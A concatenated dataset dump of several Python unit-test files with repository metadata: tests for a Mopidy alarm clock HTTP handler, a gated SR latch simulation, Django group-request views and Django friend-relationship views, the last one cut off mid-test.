69c760b48e8ab047499cd1efa24eea943c69e8bf
| 9,689
|
py
|
Python
|
tests/test_http.py
|
dubaleeiro/mopidy-alarmclock
|
19bf94b4747be1d363859a3de8cf7ca001e03537
|
[
"Apache-2.0"
] | null | null | null |
tests/test_http.py
|
dubaleeiro/mopidy-alarmclock
|
19bf94b4747be1d363859a3de8cf7ca001e03537
|
[
"Apache-2.0"
] | null | null | null |
tests/test_http.py
|
dubaleeiro/mopidy-alarmclock
|
19bf94b4747be1d363859a3de8cf7ca001e03537
|
[
"Apache-2.0"
] | 3
|
2017-04-06T14:03:15.000Z
|
2020-12-27T11:56:16.000Z
|
from __future__ import unicode_literals
import datetime
import unittest
from freezegun import freeze_time
import mock
from mopidy_alarmclock import http
class HttpTest(unittest.TestCase):
@freeze_time("2015-05-03 07:17:53")
def test_SetAlarmRequestHandler(self):
config = mock.Mock()
core = mock.Mock()
alarm_manager = mock.Mock()
msg_store = http.MessageStore()
patcher = mock.patch.object(http.SetAlarmRequestHandler, '__bases__', (mock.Mock,))
with patcher:
patcher.is_local = True
handler = http.SetAlarmRequestHandler()
handler.initialize(config, core, alarm_manager, msg_store)
handler.redirect = mock.Mock()
handler.get_argument = mock.Mock()
# Test 1
handler.get_argument.side_effect = lambda v, d: {'playlist': 'Playlist URI', 'time': '8:00', 'random': '1', 'volume': '81', 'incsec': '23'}[v]
handler.post()
alarm_manager.set_alarm.assert_called_once_with(datetime.datetime(2015, 05, 03, 8, 0), 'Playlist URI', True, 81, 23)
self.assertEqual(msg_store.msg_code, 'ok')
handler.redirect.assert_called_once_with('/alarmclock/')
# Cleanup
alarm_manager.reset_mock()
handler.redirect.reset_mock()
msg_store.msg_code = None
# Test 2 - defaults, time format
handler.get_argument.side_effect = lambda v, d: {'playlist': 'Playlist URI', 'time': '05:7', 'random': d, 'volume': d, 'incsec': d}[v]
handler.post()
# WARNING! Default configuration must be also updated in README.rst and ext.conf
# WARNING! Internal defaults of volume and volume increase seconds are in SetAlarmRequestHandler of http.py
alarm_manager.set_alarm.assert_called_once_with(datetime.datetime(2015, 05, 04, 5, 7), 'Playlist URI', False, 100, 30)
self.assertEqual(msg_store.msg_code, 'ok')
handler.redirect.assert_called_once_with('/alarmclock/')
# Cleanup
alarm_manager.reset_mock()
handler.redirect.reset_mock()
msg_store.msg_code = None
# Test 3 - ranges, time format
handler.get_argument.side_effect = lambda v, d: {'playlist': 'Playlist URI', 'time': '23:59', 'random': '1', 'volume': '0', 'incsec': '-1'}[v]
handler.post()
# WARNING! Default configuration (AND RANGES) must be also updated in README.rst and ext.conf
# WARNING! Internal defaults of volume and volume increase seconds are in SetAlarmRequestHandler of http.py
# WARNING! Ranges of volume and volume increase seconds are in SetAlarmRequestHandler of http.py AND HTML form of index.html
alarm_manager.set_alarm.assert_called_once_with(datetime.datetime(2015, 05, 03, 23, 59), 'Playlist URI', True, 100, 30)
self.assertEqual(msg_store.msg_code, 'ok')
handler.redirect.assert_called_once_with('/alarmclock/')
# Cleanup
alarm_manager.reset_mock()
handler.redirect.reset_mock()
msg_store.msg_code = None
# Test 4 - ranges, time format
handler.get_argument.side_effect = lambda v, d: {'playlist': 'Playlist URI', 'time': '0:0', 'random': '1', 'volume': '101', 'incsec': '301'}[v]
handler.post()
# WARNING! Default configuration (AND RANGES) must be also updated in README.rst and ext.conf
# WARNING! Internal defaults of volume and volume increase seconds are in SetAlarmRequestHandler of http.py
# WARNING! Ranges of volume and volume increase seconds are in SetAlarmRequestHandler of http.py AND HTML form of index.html
alarm_manager.set_alarm.assert_called_once_with(datetime.datetime(2015, 05, 04, 0, 0), 'Playlist URI', True, 100, 30)
self.assertEqual(msg_store.msg_code, 'ok')
handler.redirect.assert_called_once_with('/alarmclock/')
# Cleanup
alarm_manager.reset_mock()
handler.redirect.reset_mock()
msg_store.msg_code = None
# Test 5 - invalid time format
handler.get_argument.side_effect = lambda v, d: {'playlist': 'Playlist URI', 'time': 'a8:00', 'random': '1', 'volume': '81', 'incsec': '23'}[v]
handler.post()
self.assertFalse(alarm_manager.set_alarm.called)
self.assertEqual(msg_store.msg_code, 'format')
handler.redirect.assert_called_once_with('/alarmclock/')
# Cleanup
alarm_manager.reset_mock()
handler.redirect.reset_mock()
msg_store.msg_code = None
# Test 6 - invalid time format
handler.get_argument.side_effect = lambda v, d: {'playlist': 'Playlist URI', 'time': '8:00a', 'random': '1', 'volume': '81', 'incsec': '23'}[v]
handler.post()
self.assertFalse(alarm_manager.set_alarm.called)
self.assertEqual(msg_store.msg_code, 'format')
handler.redirect.assert_called_once_with('/alarmclock/')
# Cleanup
alarm_manager.reset_mock()
handler.redirect.reset_mock()
msg_store.msg_code = None
# Test 7 - invalid time format
handler.get_argument.side_effect = lambda v, d: {'playlist': 'Playlist URI', 'time': '8:0a0', 'random': '1', 'volume': '81', 'incsec': '23'}[v]
handler.post()
self.assertFalse(alarm_manager.set_alarm.called)
self.assertEqual(msg_store.msg_code, 'format')
handler.redirect.assert_called_once_with('/alarmclock/')
# Cleanup
alarm_manager.reset_mock()
handler.redirect.reset_mock()
msg_store.msg_code = None
# Test 8 - invalid time format
handler.get_argument.side_effect = lambda v, d: {'playlist': 'Playlist URI', 'time': '800', 'random': '1', 'volume': '81', 'incsec': '23'}[v]
handler.post()
self.assertFalse(alarm_manager.set_alarm.called)
self.assertEqual(msg_store.msg_code, 'format')
handler.redirect.assert_called_once_with('/alarmclock/')
# Cleanup
alarm_manager.reset_mock()
handler.redirect.reset_mock()
msg_store.msg_code = None
# Test 9 - invalid time format
handler.get_argument.side_effect = lambda v, d: {'playlist': 'Playlist URI', 'time': '8_00', 'random': '1', 'volume': '81', 'incsec': '23'}[v]
handler.post()
self.assertFalse(alarm_manager.set_alarm.called)
self.assertEqual(msg_store.msg_code, 'format')
handler.redirect.assert_called_once_with('/alarmclock/')
# Cleanup
alarm_manager.reset_mock()
handler.redirect.reset_mock()
msg_store.msg_code = None
# Test 10 - invalid time format
handler.get_argument.side_effect = lambda v, d: {'playlist': 'Playlist URI', 'time': '', 'random': '1', 'volume': '81', 'incsec': '23'}[v]
handler.post()
self.assertFalse(alarm_manager.set_alarm.called)
self.assertEqual(msg_store.msg_code, 'format')
handler.redirect.assert_called_once_with('/alarmclock/')
# Cleanup
alarm_manager.reset_mock()
handler.redirect.reset_mock()
msg_store.msg_code = None
# Test 11 - invalid time format
handler.get_argument.side_effect = lambda v, d: {'playlist': 'Playlist URI', 'time': 'a', 'random': '1', 'volume': '81', 'incsec': '23'}[v]
handler.post()
self.assertFalse(alarm_manager.set_alarm.called)
self.assertEqual(msg_store.msg_code, 'format')
handler.redirect.assert_called_once_with('/alarmclock/')
# Cleanup
alarm_manager.reset_mock()
handler.redirect.reset_mock()
msg_store.msg_code = None
# Test 12 - invalid time format
handler.get_argument.side_effect = lambda v, d: {'playlist': 'Playlist URI', 'time': '24:00', 'random': '1', 'volume': '81', 'incsec': '23'}[v]
handler.post()
self.assertFalse(alarm_manager.set_alarm.called)
self.assertEqual(msg_store.msg_code, 'format')
handler.redirect.assert_called_once_with('/alarmclock/')
# Cleanup
alarm_manager.reset_mock()
handler.redirect.reset_mock()
msg_store.msg_code = None
# Test 13 - invalid time format
handler.get_argument.side_effect = lambda v, d: {'playlist': 'Playlist URI', 'time': '8:60', 'random': '1', 'volume': '81', 'incsec': '23'}[v]
handler.post()
self.assertFalse(alarm_manager.set_alarm.called)
self.assertEqual(msg_store.msg_code, 'format')
handler.redirect.assert_called_once_with('/alarmclock/')
# Cleanup
alarm_manager.reset_mock()
handler.redirect.reset_mock()
msg_store.msg_code = None
# Test 14 - missing time
handler.get_argument.side_effect = lambda v, d: {'playlist': 'Playlist URI', 'time': d, 'random': '1', 'volume': '81', 'incsec': '23'}[v]
with self.assertRaises(TypeError):
handler.post()
self.assertFalse(alarm_manager.set_alarm.called)
def test_CancelAlarmRequestHandler(self):
alarm_manager = mock.Mock()
msg_store = http.MessageStore()
patcher = mock.patch.object(http.CancelAlarmRequestHandler, '__bases__', (mock.Mock,))
with patcher:
patcher.is_local = True
handler = http.CancelAlarmRequestHandler()
handler.initialize(None, None, alarm_manager, msg_store)
handler.redirect = mock.Mock()
handler.get()
alarm_manager.cancel.assert_called_once_with()
self.assertEqual(msg_store.msg_code, 'cancel')
handler.redirect.assert_called_once_with('/alarmclock/')
# TODO Use Tornado unit testing
# TODO Write more (granular + comprehensive) tests
| 38.911647
| 151
| 0.648571
| 1,191
| 9,689
| 5.077246
| 0.119228
| 0.063503
| 0.049115
| 0.066975
| 0.875145
| 0.875145
| 0.863734
| 0.852323
| 0.852323
| 0.843724
| 0
| 0.025702
| 0.224997
| 9,689
| 248
| 152
| 39.068548
| 0.779598
| 0.143771
| 0
| 0.70922
| 0
| 0
| 0.12388
| 0
| 0
| 0
| 0
| 0.004032
| 0.312057
| 0
| null | null | 0
| 0.042553
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
69ec8590916aa544a8b888cefdcb9012f14a13a5
| 3,052
|
py
|
Python
|
tests/storage/test_GatedSRLatch.py
|
jamesjiang52/Bitwise
|
c71f151d23034b3f9e2a939f637be0eaa16c45c3
|
[
"MIT"
] | null | null | null |
tests/storage/test_GatedSRLatch.py
|
jamesjiang52/Bitwise
|
c71f151d23034b3f9e2a939f637be0eaa16c45c3
|
[
"MIT"
] | null | null | null |
tests/storage/test_GatedSRLatch.py
|
jamesjiang52/Bitwise
|
c71f151d23034b3f9e2a939f637be0eaa16c45c3
|
[
"MIT"
] | null | null | null |
import bitwise as bw
class TestGatedSRLatch:
def test_GatedSRLatch(self):
clock = bw.wire.Wire()
set_ = bw.wire.Wire()
reset = bw.wire.Wire()
output = bw.wire.Wire()
output_not = bw.wire.Wire()
a = bw.storage.GatedSRLatch(set_, reset, clock, output, output_not)
clock.value = 1
set_.value = 0
reset.value = 1
assert output.value == 0
assert output_not.value == 1
clock.value = 1
set_.value = 0
reset.value = 0
assert output.value == 0
assert output_not.value == 1
clock.value = 1
set_.value = 1
reset.value = 0
assert output.value == 1
assert output_not.value == 0
clock.value = 1
set_.value = 0
reset.value = 0
assert output.value == 1
assert output_not.value == 0
clock.value = 1
set_.value = 0
reset.value = 1
assert output.value == 0
assert output_not.value == 1
clock.value = 0
set_.value = 0
reset.value = 1
assert output.value == 0
assert output_not.value == 1
clock.value = 0
set_.value = 0
reset.value = 0
assert output.value == 0
assert output_not.value == 1
clock.value = 0
set_.value = 1
reset.value = 0
assert output.value == 0
assert output_not.value == 1
clock.value = 0
set_.value = 0
reset.value = 0
assert output.value == 0
assert output_not.value == 1
clock.value = 0
set_.value = 1
reset.value = 0
assert output.value == 0
assert output_not.value == 1
clock.value = 1
set_.value = 1
reset.value = 0
assert output.value == 1
assert output_not.value == 0
clock.value = 0
set_.value = 1
reset.value = 0
assert output.value == 1
assert output_not.value == 0
clock.value = 0
set_.value = 0
reset.value = 0
assert output.value == 1
assert output_not.value == 0
clock.value = 0
set_.value = 0
reset.value = 1
assert output.value == 1
assert output_not.value == 0
clock.value = 0
set_.value = 0
reset.value = 0
assert output.value == 1
assert output_not.value == 0
clock.value = 0
set_.value = 0
reset.value = 1
assert output.value == 1
assert output_not.value == 0
clock.value = 1
set_.value = 0
reset.value = 1
assert output.value == 0
assert output_not.value == 1
clock.value = 1
set_.value = 0
reset.value = 0
assert output.value == 0
assert output_not.value == 1
print(a.__doc__)
print(a)
a(set=1, reset=0, clock=1, output=None, output_not=None)
assert output.value == 1
assert output_not.value == 0
| 23.84375
| 75
| 0.52097
| 391
| 3,052
| 3.946292
| 0.063939
| 0.209981
| 0.171095
| 0.256643
| 0.841866
| 0.841866
| 0.841866
| 0.841866
| 0.841866
| 0.816591
| 0
| 0.050911
| 0.388598
| 3,052
| 127
| 76
| 24.031496
| 0.775991
| 0
| 0
| 0.884615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.365385
| 1
| 0.009615
| false
| 0
| 0.009615
| 0
| 0.028846
| 0.019231
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
38a5d2442b10637ad4381cc22fa97e33c07a0adc
| 16,998
|
py
|
Python
|
app/group_requests/tests.py
|
porowns/Krypted-Auth
|
ed171bfbd1c98a4c171ddf6a20b18691330b1646
|
[
"MIT"
] | 6
|
2017-12-13T21:53:05.000Z
|
2018-10-04T02:47:05.000Z
|
app/group_requests/tests.py
|
porowns/Krypted-Auth
|
ed171bfbd1c98a4c171ddf6a20b18691330b1646
|
[
"MIT"
] | 106
|
2019-08-11T23:00:39.000Z
|
2021-06-10T19:45:54.000Z
|
app/group_requests/tests.py
|
KryptedGaming/kryptedauth
|
ed171bfbd1c98a4c171ddf6a20b18691330b1646
|
[
"MIT"
] | 10
|
2020-01-18T11:28:44.000Z
|
2022-02-21T06:08:39.000Z
|
from django.test import TestCase
from django.urls import reverse_lazy, reverse
from django.apps import apps
from unittest import skipIf
from django.contrib.auth.models import User, Group, Permission
from django.core.exceptions import PermissionDenied
from .models import GroupRequest, OpenGroup, ClosedGroup
class GroupRequestDefaultTestCase(TestCase):
@staticmethod
def get_user():
return User.objects.get(username="GroupTest")
def setUp(self):
if apps.is_installed('django_eveonline_group_states'):
return
User.objects.create_user(username="GroupTest",
password="TestPassword",
email="test@kryptedgaming.com")
group_a = Group.objects.create(name="GROUP A")
open_group = Group.objects.create(name="OPEN GROUP")
closed_group = Group.objects.create(name="CLOSED GROUP")
OpenGroup.objects.create(group=open_group)
ClosedGroup.objects.create(group=closed_group)
@skipIf(apps.is_installed('django_eveonline_group_states'), "Skipping base unit test(s) due to django_eveonline_group_states")
def test_view_groups(self):
url = reverse_lazy('group-list')
response = self.client.get(url)
self.assertTrue(response.status_code == 302)
# test successful access
self.client.login(username="GroupTest", password="TestPassword")
response = self.client.get(url)
self.assertTrue(response.status_code == 200)
expected_result = {
"group": Group.objects.get(name="GROUP A"),
"open": False,
"requested": None,
"request_count": 0,
}
self.assertTrue(expected_result in response.context['groups'])
expected_result = {
"group": Group.objects.get(name="OPEN GROUP"),
"open": True,
"requested": None,
"request_count": 0,
}
self.assertTrue(expected_result in response.context['groups'])
@skipIf(apps.is_installed('django_eveonline_group_states'), "Skipping base unit test(s) due to django_eveonline_group_states")
def test_request_group_success(self):
successful_group=Group.objects.get(name="GROUP A")
url = reverse_lazy('group-request', args=(successful_group.pk,))
response = self.client.get(url)
self.assertTrue(response.status_code == 302)
# test successful access
self.client.login(username="GroupTest", password="TestPassword")
response = self.client.get(url, follow=True)
self.assertTrue(response.status_code == 200)
# verify group request exists
self.assertTrue(GroupRequest.objects.filter(
request_user=self.get_user(),
request_group__pk=successful_group.pk,
response_action="PENDING").exists()
)
@skipIf(apps.is_installed('django_eveonline_group_states'), "Skipping base unit test(s) due to django_eveonline_group_states")
def test_request_group_success_open_group(self):
successful_group=Group.objects.get(name="OPEN GROUP")
url = reverse_lazy('group-request', args=(successful_group.pk,))
response = self.client.get(url)
self.assertTrue(response.status_code == 302)
# test successful access
self.client.login(username="GroupTest", password="TestPassword")
response = self.client.get(url, follow=True)
self.assertTrue(response.status_code == 200)
# verify group request exists
self.assertTrue(GroupRequest.objects.filter(
request_user=self.get_user(),
request_group__pk=successful_group.pk,
response_action="ACCEPTED").exists()
)
self.assertTrue(successful_group in self.get_user().groups.all())
@skipIf(apps.is_installed('django_eveonline_group_states'), "Skipping base unit test(s) due to django_eveonline_group_states")
def test_request_group_failure(self):
unsuccessful_group=Group.objects.get(name="CLOSED GROUP")
url = reverse_lazy('group-request', args=(unsuccessful_group.pk,))
response = self.client.get(url)
self.assertTrue(response.status_code == 302)
# test successful access
self.client.login(username="GroupTest", password="TestPassword")
response = self.client.get(url, follow=True)
self.assertTrue(response.status_code == 200)
# verify group request exists
self.assertFalse(GroupRequest.objects.filter(
request_user=self.get_user(),
request_group__pk=unsuccessful_group.pk,
response_action="PENDING").exists()
)
self.assertTrue(str(list(response.context['messages'])[0]) == "You do not have access to request that group.")
class GroupRequestWithGroupStatesTestCase(TestCase):
@staticmethod
def get_user():
return User.objects.get(username="GroupTest")
def setUp(self):
if not apps.is_installed('django_eveonline_group_states'):
return
from django_eveonline_group_states.models import EveGroupState, EveUserState
group_a = Group.objects.create(name="GROUP A")
open_group = Group.objects.create(name="OPEN GROUP")
unknown_open_group = Group.objects.create(name="UNASSIGNED OPEN GROUP")
closed_group = Group.objects.create(name="CLOSED GROUP")
unknown_closed_group = Group.objects.create(name="UNASSIGNED CLOSED GROUP")
OpenGroup.objects.create(group=open_group)
ClosedGroup.objects.create(group=closed_group)
OpenGroup.objects.create(group=unknown_open_group)
ClosedGroup.objects.create(group=unknown_closed_group)
user = User.objects.create_user(username="GroupTest",
password="TestPassword",
email="test@kryptedgaming.com")
state = EveGroupState.objects.create(
name="Default",
priority=-1,
)
state.default_groups.add(group_a)
state.enabling_groups.add(open_group)
state.enabling_groups.add(closed_group)
EveUserState(
user=user,
state=state
).save()
@skipIf(not apps.is_installed('django_eveonline_group_states'), "Skipping specialized test(s) due to django_eveonline_group_states")
def test_view_groups_with_group_states(self):
url = reverse_lazy('group-list')
response = self.client.get(url)
self.assertTrue(response.status_code == 302)
# test successful access
self.client.login(username="GroupTest", password="TestPassword")
response = self.client.get(url)
self.assertTrue(response.status_code == 200)
expected_result = {
"group": Group.objects.get(name="GROUP A"),
"open": False,
}
self.assertTrue(expected_result in response.context['groups'])
expected_result = {
"group": Group.objects.get(name="OPEN GROUP"),
"open": True,
}
self.assertTrue(expected_result in response.context['groups'])
expected_result = {
"group": Group.objects.get(name="UNASSIGNED OPEN GROUP"),
"open": True,
}
self.assertTrue(expected_result not in response.context['groups'])
expected_result = {
"group": Group.objects.get(name="CLOSED GROUP"),
"open": True,
}
self.assertTrue(expected_result not in response.context['groups'])
@skipIf(not apps.is_installed('django_eveonline_group_states'), "Skipping specialized test(s) due to django_eveonline_group_states")
def test_request_group_with_group_states(self):
successful_group=Group.objects.get(name="GROUP A")
url = reverse_lazy('group-request', args=(successful_group.pk,))
response = self.client.get(url)
self.assertTrue(response.status_code == 302)
# test successful access
self.client.login(username="GroupTest", password="TestPassword")
response = self.client.get(url, follow=True)
self.assertTrue(response.status_code == 200)
# verify group request exists
self.assertTrue(GroupRequest.objects.filter(
request_user=self.get_user(),
request_group__pk=successful_group.pk,
response_action="PENDING").exists()
)
@skipIf(not apps.is_installed('django_eveonline_group_states'), "Skipping specialized test(s) due to django_eveonline_group_states")
def test_request_group_with_group_states_open_group(self):
successful_group=Group.objects.get(name="OPEN GROUP")
url = reverse_lazy('group-request', args=(successful_group.pk,))
response = self.client.get(url)
self.assertTrue(response.status_code == 302)
# test successful access
self.client.login(username="GroupTest", password="TestPassword")
response = self.client.get(url, follow=True)
self.assertTrue(response.status_code == 200)
# verify group request exists
self.assertTrue(GroupRequest.objects.filter(
request_user=self.get_user(),
request_group__pk=successful_group.pk,
response_action="ACCEPTED").exists()
)
self.assertTrue(successful_group in self.get_user().groups.all())
@skipIf(not apps.is_installed('django_eveonline_group_states'), "Skipping base unit test(s) due to django_eveonline_group_states")
def test_request_group_with_group_states_open_group_not_in_state(self):
unsuccessful_group=Group.objects.get(name="UNASSIGNED OPEN GROUP")
url = reverse_lazy('group-request', args=(unsuccessful_group.pk,))
response = self.client.get(url)
self.assertTrue(response.status_code == 302)
# test successful access
self.client.login(username="GroupTest", password="TestPassword")
response = self.client.get(url, follow=True)
self.assertTrue(response.status_code == 200)
# verify group request exists
self.assertFalse(GroupRequest.objects.filter(
request_user=self.get_user(),
request_group__pk=unsuccessful_group.pk,
response_action="PENDING").exists()
)
self.assertTrue(str(list(response.context['messages'])[0]) == "You do not have access to request that group.")
class GroupRequestAdministrationTestCase(TestCase):
@staticmethod
def get_user():
return User.objects.get(username="GroupTest")
def setUp(self):
group = Group.objects.create(name="GROUP")
admin = User.objects.create_user(username="GroupAdmin",
password="TestPassword",
email="test@kryptedgaming.com",
)
manager = User.objects.create_user(username="GroupManager",
password="TestPassword",
email="test@kryptedgaming.com")
Permission.objects.get(codename="view_grouprequest").user_set.add(manager)
Permission.objects.get(codename="change_grouprequest").user_set.add(manager)
Permission.objects.get(codename="view_grouprequest").user_set.add(admin)
Permission.objects.get(codename="change_grouprequest").user_set.add(admin)
Permission.objects.get(codename="bypass_group_requirement").user_set.add(admin)
user_1 = User.objects.create_user(username="User1",
password="TestPassword",
email="test@kryptedgaming.com")
user_2 = User.objects.create_user(username="User2",
password="TestPassword",
email="test@kryptedgaming.com")
GroupRequest(
request_user=user_1,
request_group=group,
).save()
GroupRequest(
request_user=user_2,
request_group=group,
).save()
def test_view_group_request_as_admin(self):
user = User.objects.get(username="GroupAdmin")
group_pk = Group.objects.get(name="GROUP").pk
# test redirect
url = reverse_lazy('group-request-list', args=(group_pk,))
response = self.client.get(url)
self.assertTrue(response.status_code == 302)
# test successful access
self.client.login(username="GroupAdmin", password="TestPassword")
response = self.client.get(url, follow=True)
self.assertTrue(response.status_code == 200)
self.assertTrue(response.context['group_requests'].count() == 2)
def test_view_group_request_as_manager(self):
user = User.objects.get(username="GroupManager")
group = Group.objects.get(name="GROUP")
# test redirect
url = reverse_lazy('group-request-list', args=(group.pk,))
response = self.client.get(url)
self.assertTrue(response.status_code == 302)
# test rejected access
self.client.login(username="GroupManager", password="TestPassword")
response = self.client.get(url)
self.assertTrue(response.status_code != 200)
user.groups.add(group)
response = self.client.get(url)
self.assertTrue(response.status_code == 200)
self.assertTrue(response.context['group_requests'].count() == 2)
user.groups.remove(group)
def test_approve_group_request_as_admin(self):
user = User.objects.get(username="GroupAdmin")
group_pk = Group.objects.get(name="GROUP").pk
group_request_pk = GroupRequest.objects.all()[0].pk
# test redirect
url = reverse_lazy('group-request-approve', args=(group_pk, group_request_pk,))
response = self.client.get(url)
self.assertTrue(response.status_code == 302)
# test successful access
self.client.login(username="GroupAdmin", password="TestPassword")
response = self.client.get(url, follow=True)
self.assertTrue(response.status_code == 200)
gr = GroupRequest.objects.get(pk=1)
self.assertTrue(gr.response_action == "ACCEPTED")
self.assertTrue(gr.request_group in gr.request_user.groups.all())
def test_deny_group_request_as_admin(self):
user = User.objects.get(username="GroupAdmin")
group_pk = Group.objects.get(name="GROUP").pk
group_request_pk = GroupRequest.objects.all()[0].pk
# test redirect
url = reverse_lazy('group-request-deny', args=(group_pk, group_request_pk,))
response = self.client.get(url)
self.assertTrue(response.status_code == 302)
# test successful access
self.client.login(username="GroupAdmin", password="TestPassword")
response = self.client.get(url, follow=True)
gr = GroupRequest.objects.get(pk=1)
self.assertTrue(response.status_code == 200)
self.assertTrue(gr.response_action == "REJECTED")
self.assertTrue(gr.request_group not in gr.request_user.groups.all())
def test_approve_group_request_as_manager(self):
user = User.objects.get(username="GroupManager")
group = Group.objects.get(name="GROUP")
group_request_pk = GroupRequest.objects.all()[0].pk
# test redirect
url = reverse_lazy('group-request-approve', args=(group.pk, group_request_pk,))
response = self.client.get(url)
self.assertTrue(response.status_code == 302)
# test fail
self.client.login(username="GroupManager", password="TestPassword")
response = self.client.get(url)
gr = GroupRequest.objects.get(pk=1)
self.assertTrue(gr.response_action != "ACCEPTED")
self.assertTrue(gr.request_group not in gr.request_user.groups.all())
# test success
user.groups.add(group)
response = self.client.get(url, follow=True)
self.assertTrue(response.status_code == 200)
gr = GroupRequest.objects.get(pk=1)
self.assertTrue(gr.response_action == "ACCEPTED")
self.assertTrue(gr.request_group in gr.request_user.groups.all())
def test_deny_group_request_as_manager(self):
user = User.objects.get(username="GroupManager")
group = Group.objects.get(name="GROUP")
group_request_pk = GroupRequest.objects.all()[0].pk
# test redirect
url = reverse_lazy('group-request-deny', args=(group.pk, group_request_pk,))
response = self.client.get(url)
self.assertTrue(response.status_code == 302)
# test fail
self.client.login(username="GroupManager", password="TestPassword")
response = self.client.get(url)
gr = GroupRequest.objects.get(pk=1)
self.assertTrue(gr.response_action != "REJECTED")
# test success
user.groups.add(group)
response = self.client.get(url, follow=True)
self.assertTrue(response.status_code == 200)
gr = GroupRequest.objects.get(pk=1)
self.assertTrue(gr.response_action == "REJECTED")
self.assertTrue(gr.request_group not in gr.request_user.groups.all())
| 41.661765
| 136
| 0.663019
| 1,956
| 16,998
| 5.585378
| 0.070041
| 0.071762
| 0.051076
| 0.059588
| 0.917895
| 0.903799
| 0.869748
| 0.863524
| 0.84357
| 0.817025
| 0
| 0.008326
| 0.222732
| 16,998
| 407
| 137
| 41.764128
| 0.818574
| 0.033592
| 0
| 0.727273
| 0
| 0
| 0.146316
| 0.043913
| 0
| 0
| 0
| 0
| 0.188312
| 1
| 0.064935
| false
| 0.068182
| 0.025974
| 0.00974
| 0.116883
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
38a6e0cc3b6f365c229b1798a489dd83620e615a
| 6,781
|
py
|
Python
|
Net640/apps/friends/tests/test_views.py
|
86Ilya/net640kb
|
6724f3da3b678b637e0e776ee0d4953753ee2e05
|
[
"MIT"
] | 1
|
2019-06-18T09:50:29.000Z
|
2019-06-18T09:50:29.000Z
|
Net640/apps/friends/tests/test_views.py
|
86Ilya/net640kb
|
6724f3da3b678b637e0e776ee0d4953753ee2e05
|
[
"MIT"
] | 10
|
2019-12-24T07:05:29.000Z
|
2022-02-10T07:42:44.000Z
|
Net640/apps/friends/tests/test_views.py
|
86Ilya/net640kb
|
6724f3da3b678b637e0e776ee0d4953753ee2e05
|
[
"MIT"
] | null | null | null |
from uuid import uuid1
from django.test import TestCase, Client
from django.urls import reverse
from Net640.apps.user_profile.models import User
from Net640.apps.user_profile.models import RELATIONSHIP_FRIENDS, RELATIONSHIP_REQUEST_HAS_SENT
from Net640.apps.user_profile.models import RELATIONSHIP_WAITING_FOR_ACCEPT, NO_RELATIONSHIP
class TestFriendsView(TestCase):
password = '12345678'
def setUp(self):
random_name = str(uuid1())
self.user1 = User(username=random_name, email=random_name + '@m.ru', is_active=True)
self.user1.set_password(self.password)
self.user1.save()
random_name = str(uuid1())
self.user2 = User(username=random_name, email=random_name + '@m.ru', is_active=True)
self.user2.set_password(self.password)
self.user2.save()
def test_view_send_request_for_relationship(self):
client = Client()
client.login(username=self.user1.username, password=self.password)
response = client.post(reverse('friends:user_view', kwargs={'user_id': self.user2.id}), {'action': 'add'})
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()['relationship_status'], RELATIONSHIP_REQUEST_HAS_SENT)
self.user1.refresh_from_db()
self.user2.refresh_from_db()
self.assertEqual(self.user1.check_relationship(self.user2), RELATIONSHIP_REQUEST_HAS_SENT)
self.assertEqual(self.user2.check_relationship(self.user1), RELATIONSHIP_WAITING_FOR_ACCEPT)
def test_view_cancel_own_send_request_for_relationship(self):
client = Client()
client.login(username=self.user1.username, password=self.password)
response = client.post(reverse('friends:user_view', kwargs={'user_id': self.user2.id}), {'action': 'add'})
self.assertEqual(response.status_code, 200)
self.user1.refresh_from_db()
self.user2.refresh_from_db()
self.assertEqual(self.user1.check_relationship(self.user2), RELATIONSHIP_REQUEST_HAS_SENT)
self.assertEqual(self.user2.check_relationship(self.user1), RELATIONSHIP_WAITING_FOR_ACCEPT)
response = client.post(reverse('friends:my_friends'), {'action': 'cancel', 'user_id': self.user2.id})
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()['relationship_status'], NO_RELATIONSHIP)
self.user1.refresh_from_db()
self.user2.refresh_from_db()
self.assertEqual(self.user1.check_relationship(self.user2), NO_RELATIONSHIP)
self.assertEqual(self.user2.check_relationship(self.user1), NO_RELATIONSHIP)
def test_view_cancel_foreign_send_request_for_relationship(self):
client = Client()
client.login(username=self.user1.username, password=self.password)
response = client.post(reverse('friends:user_view', kwargs={'user_id': self.user2.id}), {'action': 'add'})
self.assertEqual(response.status_code, 200)
self.user1.refresh_from_db()
self.user2.refresh_from_db()
self.assertEqual(self.user1.check_relationship(self.user2), RELATIONSHIP_REQUEST_HAS_SENT)
self.assertEqual(self.user2.check_relationship(self.user1), RELATIONSHIP_WAITING_FOR_ACCEPT)
client.login(username=self.user2.username, password=self.password)
response = client.post(reverse('friends:my_friends'), {'action': 'cancel', 'user_id': self.user1.id})
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()['relationship_status'], NO_RELATIONSHIP)
self.user1.refresh_from_db()
self.user2.refresh_from_db()
self.assertEqual(self.user1.check_relationship(self.user2), NO_RELATIONSHIP)
self.assertEqual(self.user2.check_relationship(self.user1), NO_RELATIONSHIP)
def test_add_to_friends(self):
client = Client()
client.login(username=self.user1.username, password=self.password)
response = client.post(reverse('friends:user_view', kwargs={'user_id': self.user2.id}), {'action': 'add'})
self.assertEqual(response.status_code, 200)
self.user1.refresh_from_db()
self.user2.refresh_from_db()
self.assertEqual(self.user1.check_relationship(self.user2), RELATIONSHIP_REQUEST_HAS_SENT)
self.assertEqual(self.user2.check_relationship(self.user1), RELATIONSHIP_WAITING_FOR_ACCEPT)
